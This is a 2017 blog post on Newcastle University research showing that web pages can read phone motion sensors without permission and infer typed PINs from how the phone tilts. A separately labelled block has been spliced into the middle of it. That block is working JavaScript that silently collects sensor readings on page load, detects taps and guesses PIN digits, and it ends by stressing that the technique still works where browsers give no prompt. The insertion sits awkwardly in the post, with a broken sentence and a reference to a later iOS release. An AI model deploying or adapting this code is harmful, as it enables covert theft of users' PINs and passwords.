Monday, April 17, 2017

Your PIN Numbers Can Be Guessed When You Tilt Your Phone

Researchers from Newcastle University have shown that the way you tilt your smartphone while typing in PINs and passwords can let an attacker recover them, because mobile browsers hand motion-sensor readings to any web page without asking the user's permission.

Accessing Your Smartphone’s ‘Silent’ Sensors

The team from the university's School of Computing Science point out that today's smartphones, tablets and wearables carry many (typically 25 or more) 'silent' sensors, such as gyroscopes, rotation sensors and accelerometers, that operate without any visible sign to the user. A web page carrying malicious JavaScript, viewed through the phone's ordinary browser, can read some of these sensors and use the readings to spy on what is typed.

The fact that the sensors in a single device come from many different manufacturers is also thought to add to the risk, since no one party decides which sensor readings should be treated as sensitive and protected.

Mobile Browser Flaw Means No Permission Needed

The researchers found that all the major mobile browsers (including Safari, Chrome, Opera and Firefox) let JavaScript embedded in a web page read the phone's motion and orientation sensors without any permission prompt. Nothing has to be installed: the browser's standard device-motion and device-orientation events simply deliver the readings to any script that registers for them, and in some browsers the script kept receiving readings while its tab was in the background.

Tilting Danger

One of the more striking findings is that the way the phone is tilted at the moment of a tap reveals which part of a web page the user is tapping, and from that what they are typing.

The researchers, who recovered 4-digit Android PINs with 70% accuracy on the first guess and 100% by the fifth, did this with a web page carrying their own sensor-logging JavaScript, combined with each person's characteristic way of holding and tilting the phone. That personal holding and tapping pattern can be read straight out of the sensor data, and once it has been learned, the tilt recorded around each tap maps to a position on the keypad.
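The two steps described above, collecting the sensor readings from a page and turning the tilt around each tap into a key guess, as an added example that is not the Newcastle team's code and not part of the original article. It runs both in a browser, where it registers the two sensor listeners, and under Node, where it analyses a constructed trace. The keypad layout, the per-user calibration profile, the tap-detection threshold, the 60 ms window and the demo trace are all assumptions made for illustration, and the nearest-centroid classifier is a deliberately simple stand-in for the neural network the researchers trained.

```javascript
// Added illustration (not the Newcastle team's code, not from the article):
// (1) how a page's JavaScript samples motion/orientation with no permission
// prompt, and (2) how the tilt around each tap can be turned into a key guess.

// ---- 1. Collection: what a hostile page does in the browser -----------------
// In 2017-era mobile browsers these two listeners fired with no user prompt.
// Guarded so the same file also runs under Node for the offline part below.
const samples = [];                       // { t, az, beta, gamma } per motion event
function attachSensorListeners(target) {
  if (!target || typeof target.addEventListener !== 'function') return false;
  let pose = { beta: 0, gamma: 0 };       // front/back and left/right tilt, degrees
  target.addEventListener('deviceorientation', (e) => {
    pose = { beta: e.beta, gamma: e.gamma };
  });
  target.addEventListener('devicemotion', (e) => {
    const a = e.accelerationIncludingGravity || e.acceleration || {};
    samples.push({ t: e.timeStamp, az: a.z || 0, beta: pose.beta, gamma: pose.gamma });
  });
  return true;
}
if (typeof window !== 'undefined') attachSensorListeners(window);

// ---- 2. Analysis: segment taps, then classify each one by tilt --------------
const mean = (xs) => xs.reduce((s, x) => s + x, 0) / xs.length;

// A finger tap shows up as a brief spike in acceleration along the screen
// normal (z). Every reading within `win` ms of the spike belongs to that tap,
// and the average tilt over that window is the tap's feature vector.
function segmentTaps(readings, { threshold = 1.5, win = 60 } = {}) {
  const taps = [];
  let i = 0;
  while (i < readings.length) {
    if (Math.abs(readings[i].az) < threshold) { i++; continue; }
    const t0 = readings[i].t;
    const seg = readings.filter((r) => r.t >= t0 - win && r.t <= t0 + win);
    taps.push({ t: t0, beta: mean(seg.map((r) => r.beta)), gamma: mean(seg.map((r) => r.gamma)) });
    while (i < readings.length && readings[i].t <= t0 + win) i++;   // skip the rest of this tap
  }
  return taps;
}

// Hypothetical per-user calibration profile: the mean tilt seen when this user
// hits each key of a 3x4 keypad (rows change beta, columns change gamma).
// The paper trained a neural network on real traces; nearest-centroid is the
// simplest stand-in for that classifier.
const KEYPAD = ['123', '456', '789', ' 0 '];
const profile = {};
KEYPAD.forEach((row, r) => [...row].forEach((k, c) => {
  if (k !== ' ') profile[k] = { beta: 38 + 4 * r, gamma: -6 + 6 * c };
}));

function guessKey(tap, prof) {
  let best = null, bestD = Infinity;
  for (const [k, c] of Object.entries(prof)) {
    const d = Math.hypot(tap.beta - c.beta, tap.gamma - c.gamma);
    if (d < bestD) { bestD = d; best = k; }
  }
  return best;
}
function guessPin(readings, prof) {
  return segmentTaps(readings).map((t) => guessKey(t, prof)).join('');
}

// ---- 3. Constructed trace for an offline run --------------------------------
// Synthesized 10 ms readings: a z spike at each tap instant, the user's tilt
// for that key (plus a fixed offset standing in for noise) for 60 ms either
// side of it, and a resting pose in between. This is not a captured trace.
function makeReadings(pin, prof, { start = 200, gap = 200, period = 10, end = 1000 } = {}) {
  const taps = [...pin].map((k, i) => ({ t: start + i * gap, key: k }));
  const out = [];
  for (let t = 0; t <= end; t += period) {
    const tap = taps.find((x) => Math.abs(t - x.t) <= 60);
    const pose = tap ? prof[tap.key] : { beta: 45, gamma: 0 };
    out.push({
      t,
      az: tap && t === tap.t ? 3.0 : ((t / period) % 2 ? 0.3 : -0.3),
      beta: pose.beta + (tap ? 0.8 : 0),
      gamma: pose.gamma + (tap ? -0.5 : 0),
    });
  }
  return out;
}
const DEMO_READINGS = makeReadings('3791', profile);
if (typeof window === 'undefined') {
  console.log('taps found:', segmentTaps(DEMO_READINGS).length,
              'guess:', guessPin(DEMO_READINGS, profile));
}
```

Because the demo trace is synthesized from the same profile the classifier uses, it is expected to recover the PIN; the 70% and 100% figures above are what the researchers measured on real traces, where the attacker first has to learn the victim's profile. Note that the listeners in part 1 keep running for as long as the page is open, whether or not it is the tab the user is looking at. Safari on iOS 13 and later requires a call to DeviceMotionEvent.requestPermission() before these events fire, so a silent attack of this shape no longer works there, but the technique applies unchanged wherever the events are still delivered without a prompt.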

Sounds A Bit Complicated

It has been reported that phone manufacturers and browser makers are aware of the problem identified by the researchers, but have not yet worked out how to fix it, or have not judged the risk pressing enough to commit significant resources to it.

What Does This Mean For Your Business?

Although the risk described here is one of the less obvious ones, and there is no fix or patch for it yet, the general precautions for business mobile devices still apply: keep security software up to date, delete apps you no longer use, use strong passwords, make use of the security and privacy settings on websites and apps, disable Wi-Fi and Bluetooth when not in use, be wary of fraudulent text messages, calls and voicemails, and be careful about what personal information you store on the device or hand over through apps and websites. For this particular attack, the practical step is to close browser tabs you are not using before typing a PIN or password, since a script in a forgotten tab may still be listening to the sensors.
